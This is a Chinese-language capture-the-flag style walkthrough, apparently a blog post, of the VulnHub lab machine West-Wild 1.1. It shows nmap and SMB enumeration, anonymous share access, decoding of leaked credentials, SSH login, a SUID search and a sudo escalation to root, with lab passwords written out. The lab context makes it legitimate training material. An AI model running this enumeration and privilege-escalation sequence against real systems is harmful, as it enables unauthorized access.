West-Wild-v1.1靶场复现【附代码】(权限提升)

靶机下载地址:

https://www.vulnhub.com/entry/westwild-11,338/icon-default.png?t=N7T8https://www.vulnhub.com/entry/westwild-11,338/

1. 主机发现+端口扫描+目录扫描+敏感信息获取

1.1. 主机发现

nmap -sn 192.168.7.0/24|grep -B 2 '08:00:27:7D:B1:1B'

1.2. 端口扫描

nmap 192.168.7.123 -p- -A

1.3. 目录扫描

dirb http://192.168.7.123

1.4. 敏感信息获取

whatweb http://192.168.7.123

2. WEB网站漏洞挖掘

2.1. 访问80端口页面

老规矩,看看功能点和网页源代码 -> 无漏洞点

2.2. 尝试利用139、445的SMB服务

查找共享文件夹

enum4linux 192.168.7.123

这里看到有一个 wave 共享,访问一下,需要密码,扫描结果中有很多显示空密码,空密码连接成功

smbclient //192.168.7.123/wave
get FLAG1.txt #下载至kali本地
# 在kali打开查看
cat FLAG1.txt
RmxhZzF7V2VsY29tZV9UMF9USEUtVzNTVC1XMUxELUIwcmRlcn0KdXNlcjp3YXZleApwYXNzd29yZDpkb29yK29wZW4K

2.3. GetShell

base64解码,得到 flag 1 ,以及一个账号密码

Flag1{Welcome_T0_THE-W3ST-W1LD-B0rder}
user:wavex
password:door+open

2.4. 尝试SSH连接

ssh wavex@192.168.7.123

3. 权限提升

1.查看当前用户的执行权限

sudo -l
find / -user root -perm -4000 -print 2>/dev/null

2.home下看到还有一个用户 aveng

cd /home
ls

3.两个用户目录找了找,没看到啥东西,也没有计划任务,passwd没有写入权限,查看有没有可写文件

4.查看文件内容,得到 aveng 用户的密码

cat  /usr/share/av/westsidesecret/ififoregt.sh
aveng:kaizen+80

5.切换用户到 aveng

su aveng
kaizen+80

6.查看当前用户的权限 -> 权限all,sudo也为all,尝试直接提权

sudo -l
sudo su

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

橙则Kucei

感谢您的喜欢

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值